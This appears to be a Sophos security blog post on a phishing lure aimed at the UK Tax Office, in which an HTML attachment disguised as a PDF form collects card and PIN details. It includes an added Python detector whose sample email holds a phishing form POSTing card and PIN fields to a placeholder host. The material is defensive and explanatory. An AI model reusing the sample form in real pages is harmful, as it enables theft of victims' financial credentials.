Sophos

Download Windows 7 security - A great leap forward or business as usual?

New Phishing Technique for the UK Tax Office

In my previous blog, “Easy Steps to Stop Being Phished”, I described several common phishing techniques. Today, SophosLabs received a similar phishing scam targeting the UK Tax Office. It is a variant of the scam that we encountered earlier for the Australia Tax Office. However, this time it uses a new technique.

The phishing message doesn’t contain any bogus link or dodgy reply-to field. Instead, it carries a forged HTML attachment named “payment_form.pdf” which, when opened, looks like a PDF form asking for the user’s personal identity and credit card details.

Upon further investigation, the HTML file includes a dodgy HTTP POST request (B) which attempts to submit the confidential information to a remote website. The file also has functionality to perform simple checks for invalid credit card numbers and PIN numbers (A). Isn’t that smart?
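The following added example (not from the original post, and not SophosLabs' detection logic) shows one way a mail filter could flag the attachment described above: it ignores the file name and declared type, sniffs the content, and reports any HTML form that POSTs to a remote host. The sample message and the host `collector.example` are constructed placeholders.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormFinder(HTMLParser):
    """Collect the action URL of every <form> submitted via POST."""
    def __init__(self):
        super().__init__()
        self.post_actions = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and (a.get("method") or "").lower() == "post":
            self.post_actions.append(a.get("action") or "")

def suspicious_attachments(raw: bytes):
    """Return (filename, remote_host) for attachments that are really HTML
    forms POSTing to a remote site, whatever the file name claims."""
    hits = []
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        if b"<form" not in data.lower():      # sniff content, ignore name/type
            continue
        finder = FormFinder()
        finder.feed(data.decode("utf-8", errors="replace"))
        for action in finder.post_actions:
            url = urlparse(action)
            if url.scheme in ("http", "https") and url.hostname:
                hits.append((part.get_filename(), url.hostname))
    return hits

# Constructed sample (not the real message); all hosts are placeholders.
SAMPLE = b"""\
From: refunds@tax.example
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please complete the attached form.
--b1
Content-Type: application/pdf; name="payment_form.pdf"
Content-Disposition: attachment; filename="payment_form.pdf"

<html><form method="POST" action="http://collector.example/submit.php">
Card: <input name="card"> PIN: <input type="password" name="pin"></form></html>
--b1--
"""
```

Calling `suspicious_attachments(SAMPLE)` returns the attachment name together with the host the form would submit to, which is the pair an analyst needs for blocking and triage.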

SophosLabs has already blocked this kind of phishing campaign. Certainly we will see more new tricky phishing techniques in the future.

